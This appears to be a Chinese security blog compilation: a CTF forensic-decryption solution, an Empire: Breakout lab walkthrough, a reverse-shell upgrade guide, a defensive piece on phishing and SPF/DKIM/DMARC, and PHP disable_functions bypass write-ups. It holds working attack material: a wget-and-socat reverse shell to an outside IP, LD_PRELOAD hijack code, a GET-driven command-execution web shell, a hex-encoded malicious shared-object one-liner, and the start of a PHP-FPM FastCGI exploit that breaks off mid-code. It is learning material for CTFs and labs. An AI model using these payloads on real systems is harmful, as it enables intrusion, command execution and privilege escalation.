INSERT INTO "public"."tab_channel_order_list" VALUES (2817, '987519535765', 'GG币', NULL, '2022-04-18 02:35:20', 5, 3, 'lJdrlG1o');
INSERT INTO "public"."tab_channel_order_list" VALUES (2880, '657461012245', 'GG币', NULL, '2022-04-18 11:18:57', 5, 3, 'mpZtmmlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2906, '278546157230', 'GG币', NULL, '2022-04-18 13:32:32', 5, 3, 'mJVxnGpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2921, '999235838187', 'GG币', NULL, '2022-04-18 14:45:06', 5, 3, 'mJVwmWxu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2935, '861319935688', 'GG币', NULL, '2022-04-18 16:24:05', 5, 3, 'mplslWps');

最后字符串就是金额，然后利用上一题的加密算法进行解密

<?php
$data = '';
$key = 'jyzg123456';
header('Content-type:textml;charset=utf-8');
$key = md5($key);
$x = 0;
$data = base64_decode($data);
$len = mb_strlen($data);
$l = mb_strlen($key);
$char = '';
$str = '';
for ($i = 0; $i < $len; $i++) {
    if ($x == $l) {
        $x = 0;
    }
    $char .= mb_substr($key, $x, 1);
    $x++;
}
for ($i = 0; $i < $len; $i++) {
    if (ord(mb_substr($data, $i, 1)) < ord(mb_substr($char, $i, 1))) {
        $str .= chr((ord(mb_substr($data, $i, 1)) + 256) - ord(mb_substr($char, $i, 1)));
    } else {
        $str .= chr(ord(mb_substr($data, $i, 1)) - ord(mb_substr($char, $i, 1)));
    }
}
echo $str;

每天汇率不同，在sql文件里有描述：

INSERT INTO "public"."info_bargain" VALUES ('2', 'RMB', 0.04, '2022-04-02 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('3', 'RMB', 0.06, '2022-04-03 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('4', 'RMB', 0.05, '2022-04-04 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('5', 'RMB', 0.07, '2022-04-05 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('6', 'RMB', 0.10, '2022-04-06 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('7', 'RMB', 0.15, '2022-04-07 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('8', 'RMB', 0.17, '2022-04-08 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('9', 'RMB', 0.23, '2022-04-09 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('10', 'RMB', 0.22, '2022-04-10 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('11', 'RMB', 0.25, '2022-04-11 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('12', 'RMB', 0.29, '2022-04-12 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('13', 'RMB', 0.20, '2022-04-13 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('14', 'RMB', 0.28, '2022-04-14 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('15', 'RMB', 0.33, '2022-04-15 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('16', 'RMB', 0.35, '2022-04-16 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('17', 'RMB', 0.35, '2022-04-17 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('18', 'RMB', 0.37, '2022-04-18 00:00:00');

数据不多总共132条，可以直接手撕，计算公式就是解密后数量乘以当天汇率，结果为：15758353.76

EMPIRE：BREAKOUT

跟前面的靶机相比这篇太简单了，但它是个系列，从第一篇开始吧。

靶机描述

This box was created to be an Easy box, but it can be Medium if you get lost.

For hints discord Server ( https://discord.gg/7asvAhCEhe )

这个盒子是一个简单的盒子，但如果你迷路了，它就变成中等的了。

信息搜集

目标确认

攻击机Kali IP：192.168.93.131

靶机 IP：192.168.93.140

开放 80 & 139 & 445 & 10000 & 20000端口

目录扫描：

这个地方可以看到Apache版本是2.4，记一下，说不定会用到。

回到主页，发现有提示：

应该是Brainfuck，解密一下：

.2uqPEfj3D<P'a-3

10000端口和20000端口都是一个登录界面：

漏洞利用

10000端口和2000端口的面板其实并不一样，尝试登录20000端口的面板；

在nmap的扫描结果中可以看到安装了Samba 4.6.2版本，所以用 enum4linux 扫描一下 SMB 服务器中的用户：

Username：cyber
Password：.2uqPEfj3D<P'a-3

登陆以后，在左下角可以看到终端操作，利用这个我们可以尝试弹shell到kali上：

在当前目录下，可以看到user.txt，找到了第一个flag

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

提权

在当前目录下可以看到有一个tar文件，利用命令查看相关属性：

file tar  #查看文件类型
getcap tar #查看和设置程序文件的 capabilities 属性

cap_dac_read_search=ep功能。可以读取文件。

在/var/backups/目录下可以看到备份文件.old_pass.bak，cat的话权限不够，这个地方就用到了上面的tar命令，用法可以--help

找到密码，切换root用户 & 升级shell

Linux 反向 shell 升级为完全可用的 TTY shell

前言

最近一周在打靶机，要弹shell，为了shell更加美观且易于操作，就浅浅写一下~

升级远程shell（仅限于Unix机器）

通常，在通过 nc 捕获 shell 之后，会在一个功能非常有限的 shell 中。例如没有命令历史记录（并使用“向上”和“向下”箭头循环浏览它们）和文件名称、命令自动完成等。在缺少这些功能的 shell 中查询或操作会比较麻烦。

注意：要检查 shell 是否是 TTY shell，请使用 tty 命令。

rlwrap

可以通过使用 rlwrap 命令包装 nc 侦听器来减轻对 shell 的一些限制。默认情况下不会安装它，需要使用 sudo apt rlwrap 或 apt-get install rlwrap 安装。

rlwrap nc -lvnp $port

使用python升级到完全交互式shell

连接到shell以后，先检查一下python的可用性，可以用which命令：
```
which python python2 python3
```

只要安装了其中任何一个，就将返回已安装二进制文件的路径。

在shell中输入命令

python3 -c 'import pty;pty.spawn("/bin/bash")';

接下来，在靶机上输入以下命令来设置一些重要的环境变量：
```
export SHELL=bash
export TERM=xterm-256color #允许 clear，并且有颜色
```
ctrl+z将shell发送到后台
设置 shell 以通过反向 shell 发送控制字符和其他原始输入。使用stty命令来执行此操作：
```
stty raw -echo;fg
```

回车一次后输入 reset 再回车将再次进入 shell 中，TTY shell升级完毕

其他语言写入交互式 shell：

echo os.system('/bin/bash')
/bin/sh -i

#python3
python3 -c 'import pty; pty.spawn("/bin/sh")'

#perl
perl -e 'exec "/bin/sh";'

#ruby
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'

#lua
lua -e "os.execute('/bin/sh')"

使用 socat

另一种方法是将 socat 二进制文件上传到靶机并获得一个完全交互式的 shell。从 https://github.com/andrew-d/static-binaries 下载适当的二进制文件。Socat 需要在两台机器上才能工作。

#在本地监听：:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#靶机:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:1234

如果在命令注入的地方注入反弹 shell，获得即时完全交互式的反向 shell：

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:1234

如果靶机访问不了互联网，就先把 socat 文件下载下来，开启 http 服务，然后将上面的路径指向你的本地地址。

也可以走scp下载这条路。

HVV蓝队–钓鱼邮件

前言

这篇文章不是写如何做一份钓鱼邮件，是打算从蓝方角度思考一下，如何防范钓鱼邮件攻击并进行识别。

希望以后红队大佬轻点打。

SMTP

讲邮件伪造，就必须要先说一下SMTP协议

SMTP被设计基于以下交流模型：当用户需要发邮件时候，邮件发送者(Sender-SMTP)建立一个与邮件接收者(Receiver-SMTP)通信的通道，发送者发送SMTP命令给接收者，接收者收到后对命令做回复。通信通道被建立后，发送者发送 MAIL 命令来指定发送者的邮件，如果接受者接收这个邮件，就回复 OK ，接着发送者发送 RCPT命令来指定接收者的邮箱，如果被接收同样回复OK，如果不接受则拒绝（不会终止整个通话）。接收者邮箱确定后，发送者用DATA命令指示要发送数据，并用一个. 结束发送。如果数据被接收，会收到OK ，然后用QUIT结束会话。

Swaks邮件伪造

Kali中内置了钓鱼邮件工具swaks里面有很重要的一点，就是Sender-smtp，发件人。如果我伪造如admin@qq.com发送一封邮件，发件人是admin@qq.com，对方收到以后怎么判断我这个发件人是不是真实的呢？

答案就是SPF记录，SPF的全称是Sender Policy Framework，是为了防范垃圾邮件而提出来的一种 DNS 记录类型，是一种 TXT 类型的记录，用于登记某个域名拥有的用来外发邮件的所有 IP 地址。

使用TXT记录已经不被推荐，但是有些DNS服务器并未针对SPF类型的记录进行实现，考虑到兼容性的问题，一个合规的SPF记录应该同时具备SPF记录和TXT记录，如下所示：

example.com. IN TXT "v=spf1 +mx a:colo.example.com/28 -all"
example.com. IN SPF "v=spf1 +mx a:colo.example.com/28 -all"

我们可以通过nslookup -q=txt qq.com找到QQ邮箱服务器的IP地址，这样收件人收到一封来自QQ的邮件后，若开起了SPF检验，他会检验发件人是否在上面的IP地址内，如果存在就认为是真的发件人，否则就是钓鱼邮件

我伪造的我的qq邮箱，这里就是失败了，返回550 SPF check failed，这个原因就是发信IP未被发送域的SPF许可

利用H-from进行中转

若发件人配置了DNS的txt记录，并且收件人开启了SPF检验，那我们是不是就不能伪造邮件了？当然不是，有一个办法是可以实现突破的，H-From，H-From类似各种监控设备的告警机制，配置一个发件邮件，网络或安全设备有告警之后就自动发送过去。常用的这种是需要认证的，如QQ的中转，

不同客户端对H-From的处置

QQ邮箱web版显示代发人
QQ邮箱手机版不显示代发人

加固

配置DNS的TXT记录

对于使用邮件服务器的用户需要在DNS中配置TXT记录，指明相关的邮箱服务器的IP地址，这样，对方若开启SPF检测，收到相关的邮件以后，会通过DNS查询的方式来查询发件人声明的IP地址。

开启SPF校验

这个主要是对于收件人来说的，当收件人收到一封邮件以后若想校验发件的是否是伪造的，可以通过开启SPF校验这种方式通过DNS查询发件人的IP地址然后再去和发件人的IP地址比对，若匹配或包含则通过SPF校验。

DKIM（感谢密码👴）

主要用来保证邮件的完整性，避免钓鱼。这种技术本质上是采用了RSA算法实现数字签字，既使用私钥加密，公钥解密。DKIM会对邮件头及正文进行签名，没有私钥下，邮件被假冒或篡改后，就会与邮件头签名不一致，从而防止这样的情况

使用RAS算法生成一对公私钥。
将私钥放到邮件服务器上，对发送的邮件使用私钥进行加密。私钥只有邮件服务器的管理者有。
公钥通过DNS的TXT类型将相应的公钥同步到DNS中，收件人收到以后通过DNS这种方式就可以查询到相应的加密算法和相关的公钥。

DMARC

DMARC是基于SPF和DKIM协议的可扩展电子邮件认证协议，通常情况下它与SPF或DKIM结合使用，并告知收件方服务器当未通过SPF或 DKIM检测时该如何处理。

浅析四种Bypass disable_fuctions

前言

emm想记一下有哪些绕过方法，不然每次都得上网查很麻烦。。。

最近很火的LD_PRELOAD

LD_PRELOAD 是 Linux 系统中的一个环境变量，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。相关文章都被写烂了呜呜呜。

LD_PRELOAD

LD_PRELOAD 可以程序运行前优先加载动态链接库，那我们可以重写程序运行过程中所调用的函数并编译成动态链接库文件，然后通过指定 LD_PRELOAD 让程序优先加载这个恶意动态链接库，最后当程序再次运行便会加载动态链接库中的恶意函数。

基于这个思路，LD_PRELOAD 可实现突破disadble_fuctions，可以分为两个部分。

一个是利用劫持getuid函数，另外一个是劫持新进程。

利用mail()启动新进程来劫持系统函数

虽然LD_PRELOAD虽然能劫持系统函数但是我们得控制PHP启动外部程序。所以我们要寻找内部可以启动新进程的PHP函数，比如处理图片、发送邮件等场景中可能存在这种函数，比如mail()

mail.php

<?php
mail('','','','');
?>

查看sendmail使用了哪些函数

readelf -s /usr/sbin/sendmail

这里使用getuid，编写so文件test.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload(){
        system("echo 'wdnmd' >/mnt/d/phpstudy_pro/WWW/wdnmd.txt");
}
int getuid()
{
        if(getenv("LD_PRELOAD")==NULL){ return 0;}
        unsetenv("LD_PRELOAD");
        payload();
}

编译一下

 gcc -shared -fPIC test.c -o test.so

接着PHP使用

<?php
putenv("LD_PRELOAD=./test.so");
mail('','','','');
?>

利用error_log触发

原理相同，劫持getuid
error_log.php

<?php
putenv("LD_PRELOAD=./test2.so");
error_log("", 1, "", "");
?

`attribute`劫持动态链接库

关于这个，github有一个项目disable_fuctions_via_LD_PRELOAD

在真实环境中，上面两种方法存在两问题：一是某些环境中web 禁止启用 senmail，甚至系统上根本未安装 sendmail，也就根本不能劫持 getuid()，而且 www-data 更改不了 php.ini ；二，即便目标可以启用 sendmail，由于未将主机名添加进 hosts 中，导致每次运行 sendmail 都要耗时半分钟等待域名解析超时返回。

搜索之后发现，GCC 有个 C 语言扩展修饰符 __attribute__((constructor))，可以让由它修饰的函数在 main() 之前执行，若它出现在共享对象中时，那么一旦共享对象被系统加载，立即将执行 __attribute__((constructor)) 修饰的函数。不要局限于仅劫持某一函数，而应考虑拦劫启动进程这一行为 。

举个例子，我们可以去尝试直接劫持系统命令whoami

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void preload (void){
    unsetenv("LD_PRELOAD");
    system("whoami");
}

┌──(root㉿DESKTOP-F3OA7VG)-[/mnt/d/phpstudy_pro/www]
└─# gcc -shared -fPIC getuid.c -o whoami.so
┌──(root㉿DESKTOP-F3OA7VG)-[/mnt/d/phpstudy_pro/www]
└─# export LD_PRELOAD=./whoami.so

基于这个原理，bypass_disablefunc.c

#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

extern char** environ;

__attribute__ ((__constructor__)) void preload (void)
{
    // get command line options and arg
    const char* cmdline = getenv("EVIL_CMDLINE");

    // unset environment variable LD_PRELOAD.
    // unsetenv("LD_PRELOAD") no effect on some 
    // distribution (e.g., centos), I need crafty trick.
    int i;
    for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                    environ[i][0] = '\0';
            }
    }

    // executive command
    system(cmdline);
}

bypass_disablefunc.php

<?php
    echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";

    $cmd = $_GET["cmd"];
    $out_path = $_GET["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";

    putenv("EVIL_CMDLINE=" . $evil_cmdline);    // 通过环境变量 EVIL_CMDLINE 向 bypass_disablefunc_x64.so 传递具体执行的命令行信息

    $so_path = $_GET["sopath"];
    putenv("LD_PRELOAD=" . $so_path);

    mail("", "", "", "");
    // error_log("", 1, "", "");
    echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; 

    unlink($out_path);
?>

本项目中有三个关键文件，bypass_disablefunc.php、bypass_disablefunc_x64.so、bypass_disablefunc_x86.so。

将bypass_disablefunc.php和bypass_disablefunc_x64.so上传到var/www/html目录，权限不够的话可以上传到其他目录再include包含目标文件即可。

payload

http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so

当然除了文件上传也可以用别的思路，直接利用php执行

file_put_contents('/tmp/1.so',pack('H*','7f454c4602010100000000000000000003003e0001000000c006000000000000400000000000000028140000000000000000000040003800060040001c001900010000000500000000000000000000000000000000000000000000000000000004090000000000000409000000000000000020000000000001000000060000000809000000000000080920000000000008092000000000005802000000000000600200000000000000002000000000000200000006000000280900000000000028092000000000002809200000000000c001000000000000c0010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050e57464040000008408000000000000840800000000000084080000000000001c000000000000001c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000040000001400000003000000474e550066bb9e247f3731670b5cdfd534ac53233e576aef00000000030000000d000000010000000600000088c22001001440090d0000000f000000110000004245d5ecbbe3927cd871581cb98df10eead3ef0e6d1287c2000000000000000000000000000000000000000000000000000000000000000003000900380600000000000000000000000000007d00000012000000000000000000000000000000000000001c00000020000000000000000000000000000000000000008b00000012000000000000000000000000000000000000009d00000021000000000000000000000000000000000000000100000020000000000000000000000000000000000000009e00000011000000000000000000000000000000000000006100000020000000000000000000000000000000000000009c0000001100000000000000000000000000000000000000380000002000000000000000000000000000000000000000520000002200000000000000000000000000000000000000840000001200000000000000000000000000000000000000a600000010001600600b2000000000000000000000000000b900000010001700680b2000000000000000000000000000ad00000010001700600b20000000000000000000000000001000000012000900380600000000000000000000000000001600000012000c00600800000000000000000000000000007500000012000b00c0070000000000009d00000000000000005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573007072656c6f616400676574656e76007374727374720073797374656d006c6962632e736f2e36005f5f656e7669726f6e005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e3500000000000200000002000200000002000000020000000200020001000100010001000100010001000100920000001000000000000000751a690900000200be00000000000000080920000000000008000000000000009007000000000000180920000000000008000000000000005007000000000000580b2000000000000800000000000000580b200000000000100920000000000001000000120000000000000000000000e80a20000000000006000000030000000000000000000000f00a20000000000006000000060000000000000000000000f80a20000000000006000000070000000000000000000000000b20000000000006000000080000000000000000000000080b200000000000060000000a0000000000000000000000100b200000000000060000000b0000000000000000000000300b20000000000007000000020000000000000000000000380b20000000000007000000040000000000000000000000400b20000000000007000000060000000000000000000000480b200000000000070000000b0000000000000000000000500b200000000000070000000c00000000000000000000004883ec08488b05ad0420004885c07405e8430000004883c408c30000000000000000000000000000ff35ba042000ff25bc0420000f1f4000ff25ba0420006800000000e9e0ffffffff25b20420006801000000e9d0ffffffff25aa0420006802000000e9c0ffffffff25a20420006803000000e9b0ffffffff259a0420006804000000e9a0ffffff488d3d99042000488d0599042000554829f84889e54883f80e7615488b05060420004885c074095dffe0660f1f4400005dc366666666662e0f1f840000000000488d3d59042000488d3552042000554829fe4889e548c1fe034889f048c1e83f4801c648d1fe7418488b05d90320004885c0740c5dffe0660f1f8400000000005dc366666666662e0f1f840000000000803d0904200000752748833daf03200000554889e5740c488b3dea032000e82dffffffe848ffffff5dc605e003200001f3c366666666662e0f1f840000000000488d3d8901200048833f00750be95effffff660f1f440000488b05510320004885c074e9554889e5ffd05de940ffffff554889e54883ec10488d3d9a000000e89cfeffff488945f0c745fc00000000eb4f488b0510032000488b008b55fc4863d248c1e2034801d0488b00488d35740000004889c7e8a6feffff4885c0741d488b05e2022000488b008b55fc4863d248c1e2034801d0488b00c600008345fc01488b05c1022000488b008b55fc4863d248c1e2034801d0488b004885c07592488b45f04889c7e825feffffc9c30000004883ec084883c408c34556494c5f434d444c494e45004c445f5052454c4f414400000000011b033b1800000002000000dcfdffff340000003cffffff5c0000001400000000000000017a5200017810011b0c070890010000240000001c000000a0fdffff60000000000e10460e184a0f0b770880003f1a3b2a332422000000001c00000044000000d8feffff9d00000000410e108602430d0602980c0708000000000000000000009007000000000000000000000000000050070000000000000000000000000000010000000000000092000000000000000c0000000000000038060000000000000d000000000000006008000000000000190000000000000008092000000000001b0000000000000010000000000000001a0000000000000018092000000000001c000000000000000800000000000000f5feff6f00000000b8010000000000000500000000000000c0030000000000000600000000000000f8010000000000000a00000000000000ca000000000000000b0000000000000018000000000000000300000000000000180b20000000000002000000000000007800000000000000140000000000000007000000000000001700000000000000c0050000000000000700000000000000d0040000000000000800000000000000f00000000000000009000000000000001800000000000000feffff6f00000000b004000000000000ffffff6f000000000100000000000000f0ffff6f000000008a04000000000000f9ffff6f0000000003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280920000000000000000000000000000000000000000000760600000000000086060000000000009606000000000000a606000000000000b606000000000000580b2000000000004743433a202844656269616e20342e392e322d31302b6465623875322920342e392e3200002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e740000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200b80100000000000000000000000000000000000003000300f80100000000000000000000000000000000000003000400c003000000000000000000000000000000000000030005008a0400000000000000000000000000000000000003000600b00400000000000000000000000000000000000003000700d00400000000000000000000000000000000000003000800c00500000000000000000000000000000000000003000900380600000000000000000000000000000000000003000a00600600000000000000000000000000000000000003000b00c00600000000000000000000000000000000000003000c00600800000000000000000000000000000000000003000d00690800000000000000000000000000000000000003000e00840800000000000000000000000000000000000003000f00a00800000000000000000000000000000000000003001000080920000000000000000000000000000000000003001100180920000000000000000000000000000000000003001200200920000000000000000000000000000000000003001300280920000000000000000000000000000000000003001400e80a20000000000000000000000000000000000003001500180b20000000000000000000000000000000000003001600580b20000000000000000000000000000000000003001700600b2000000000000000000000000000000000000300180000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000001001200200920000000000000000000000000001900000002000b00c00600000000000000000000000000002e00000002000b00000700000000000000000000000000004100000002000b00500700000000000000000000000000005700000001001700600b20000000000001000000000000006600000001001100180920000000000000000000000000008d00000002000b0090070000000000000000000000000000990000000100100008092000000000000000000000000000b80000000400f1ff00000000000000000000000000000000010000000400f1ff00000000000000000000000000000000cd00000001000f0000090000000000000000000000000000db0000000100120020092000000000000000000000000000000000000400f1ff00000000000000000000000000000000e700000001001600580b2000000000000000000000000000f40000000100130028092000000000000000000000000000fd00000001001600600b20000000000000000000000000000901000001001500180b20000000000000000000000000001f01000012000000000000000000000000000000000000003301000020000000000000000000000000000000000000004f01000010001600600b20000000000000000000000000005601000012000c00600800000000000000000000000000005c01000012000000000000000000000000000000000000007001000020000000000000000000000000000000000000007f01000011000000000000000000000000000000000000009401000010001700680b20000000000000000000000000009901000010001700600b2000000000000000000000000000a501000012000b00c0070000000000009d00000000000000ad0100002000000000000000000000000000000000000000c10100001100000000000000000000000000000000000000d80100002000000000000000000000000000000000000000f201000022000000000000000000000000000000000000000e02000012000900380600000000000000000000000000001402000012000000000000000000000000000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e65730072656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e36363730005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e747279006279706173735f64697361626c6566756e632e63005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f64736f5f68616e646c65005f44594e414d4943005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f00676574656e764040474c4942435f322e322e35005f49544d5f64657265676973746572544d436c6f6e655461626c65005f6564617461005f66696e690073797374656d4040474c4942435f322e322e35005f5f676d6f6e5f73746172745f5f00656e7669726f6e4040474c4942435f322e322e35005f656e64005f5f6273735f7374617274007072656c6f6164005f4a765f5265676973746572436c6173736573005f5f656e7669726f6e4040474c4942435f322e322e35005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e35005f696e6974007374727374724040474c4942435f322e322e3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000b801000000000000b8010000000000003c00000000000000030000000000000008000000000000000000000000000000380000000b0000000200000000000000f801000000000000f801000000000000c80100000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000c003000000000000c003000000000000ca0000000000000000000000000000000100000000000000000000000000000048000000ffffff6f02000000000000008a040000000000008a04000000000000260000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000b004000000000000b004000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000d004000000000000d004000000000000f0000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000c005000000000000c0050000000000007800000000000000030000000a0000000800000000000000180000000000000078000000010000000600000000000000380600000000000038060000000000001a00000000000000000000000000000004000000000000000000000000000000730000000100000006000000000000006006000000000000600600000000000060000000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000c006000000000000c0060000000000009d01000000000000000000000000000010000000000000000000000000000000840000000100000006000000000000006008000000000000600800000000000009000000000000000000000000000000040000000000000000000000000000008a00000001000000020000000000000069080000000000006908000000000000180000000000000000000000000000000100000000000000000000000000000092000000010000000200000000000000840800000000000084080000000000001c00000000000000000000000000000004000000000000000000000000000000a0000000010000000200000000000000a008000000000000a0080000000000006400000000000000000000000000000008000000000000000000000000000000aa0000000e0000000300000000000000080920000000000008090000000000001000000000000000000000000000000008000000000000000000000000000000b60000000f0000000300000000000000180920000000000018090000000000000800000000000000000000000000000008000000000000000000000000000000c2000000010000000300000000000000200920000000000020090000000000000800000000000000000000000000000008000000000000000000000000000000c700000006000000030000000000000028092000000000002809000000000000c001000000000000040000000000000008000000000000001000000000000000d0000000010000000300000000000000e80a200000000000e80a0000000000003000000000000000000000000000000008000000000000000800000000000000d5000000010000000300000000000000180b200000000000180b0000000000004000000000000000000000000000000008000000000000000800000000000000de000000010000000300000000000000580b200000000000580b0000000000000800000000000000000000000000000008000000000000000000000000000000e4000000080000000300000000000000600b200000000000600b0000000000000800000000000000000000000000000001000000000000000000000000000000e90000000100000030000000000000000000000000000000600b0000000000002400000000000000000000000000000001000000000000000100000000000000110000000300000000000000000000000000000000000000840b000000000000f200000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000780c00000000000088050000000000001b0000002b0000000800000000000000180000000000000009000000030000000000000000000000000000000000000000120000000000002802000000000000000000000000000001000000000000000000000000000000'));putenv("EVIL_CMDLINE=/readflag > /flag.txt");putenv("LD_PRELOAD=/var/www/html/1.so");error_log("",1);readfile('/flag.txt');

PHP-FPM

FastCGI 只是一个协议规范，需要每个语言具体去实现，PHP-FPM 就是 PHP 版本的 FastCGI 协议实现，有了它，就是实现 PHP 脚本与 Web 服务器（通常是 Nginx）之间的通信，同时它也是一个 PHP SAPI，从而构建起 PHP 解释器与 Web 服务器之间的桥梁。

FastCGI 则会先 fork 一个 master 进程，解析配置文件，初始化执行环境，然后再 fork 多个 worker 进程（与 Nginx 有点像），当 HTTP 请求过来时，master 进程将其会传递给一个 worker 进程，然后立即可以接受下一个请求，这样就避免了重复的初始化操作，效率自然也就提高了。而且当 worker 进程不够用时，master 进程还可以根据配置预先启动几个 worker 进程等着；当空闲 worker 进程太多时，也会关掉一些，这样不仅提高了性能，还节约了系统资源。

贴一份POC

<?php
/**
 * Note : Code is released under the GNU LGPL
 *
 * Please do not change the header of this file
 *
 * This library is free software; you can redistribute it and/or modify it under the terms of the GNU
 * Lesser General Public License as published by the Free Software Foundation; either version 2 of
 * the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
 * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 *
 * See the GNU Lesser General Public License for more details.
 */
/**
 * Handles communication with a FastCGI application
 *
 * @author      Pierrick Charron <pierrick@webstart.fr> 
 * @version     1.0
 */
class FCGIClient
{
    const VERSION_1            = 1;
    const BEGIN_REQUEST        = 1;
    const ABORT_REQUEST        = 2;
    const END_REQUEST          = 3;
    const PARAMS               = 4;
    const STDIN                = 5;
    const STDOUT               = 6;
    const STDERR               = 7;
    const DATA                 = 8;
    const GET_VALUES           = 9;
    const GET_VALUES_RESULT    = 10;
    const UNKNOWN_TYPE         = 11;
    const MAXTYPE              = self::UNKNOWN_TYPE;
    const RESPONDER            = 1;
    const AUTHORIZER           = 2;
    const FILTER               = 3;
    const REQUEST_COMPLETE     = 0;
    const CANT_MPX_CONN        = 1;
    const OVERLOADED           = 2;
    const UNKNOWN_ROLE         = 3;
    const MAX_CONNS            = 'MAX_CONNS';
    const MAX_REQS             = 'MAX_REQS';
    const MPXS_CONNS           = 'MPXS_CONNS';
    const HEADER_LEN           = 8;
    /**
     * Socket
     * @var Resource
     */
    private $_sock = null;
    /**
     * Host
     * @var String
     */
    private $_host = null;
    /**
     * Port
     * @var Integer
     */
    private $_port = null;
    /**
     * Keep Alive
     * @var Boolean
     */
    private $_keepAlive = false;
    /**
     * Constructor
     *
     * @param String $host Host of the FastCGI application
     * @param Integer $port Port of the FastCGI application
     */
    public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
    {
        $this->_host = $host;
        $this->_port = $port;
    }
    /**
     * Define whether or not the FastCGI application should keep the connection
     * alive at the end of a request
     *
     * @param Boolean $b true if the connection should stay alive, false otherwise
     */
    public function setKeepAlive($b)
    {
        $this->_keepAlive = (boolean)$b;
        if (!$this->_keepAlive && $this->_sock) {
            fclose($this->_sock);
        }
    }
    /**
     * Get the keep alive status
     *
     * @return Boolean true if the connection should stay alive, false otherwise
     */
    public function getKeepAlive()
    {
        return $this->_keepAlive;
    }
    /**
     * Create a connection to the FastCGI application
     */
    private function connect()
    {
        if (!$this->_sock) {
            $this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
            if (!$this->_sock) {
                throw new Exception('Unable to connect to FastCGI application');
            }
        }
    }
    /**
     * Build a FastCGI packet
     *
     * @param Integer $type Type of the packet
     * @param String $content Content of the packet
     * @param Integer $requestId RequestId
     */
    private function buildPacket($type, $content, $requestId = 1)
    {
        $clen = strlen($content);
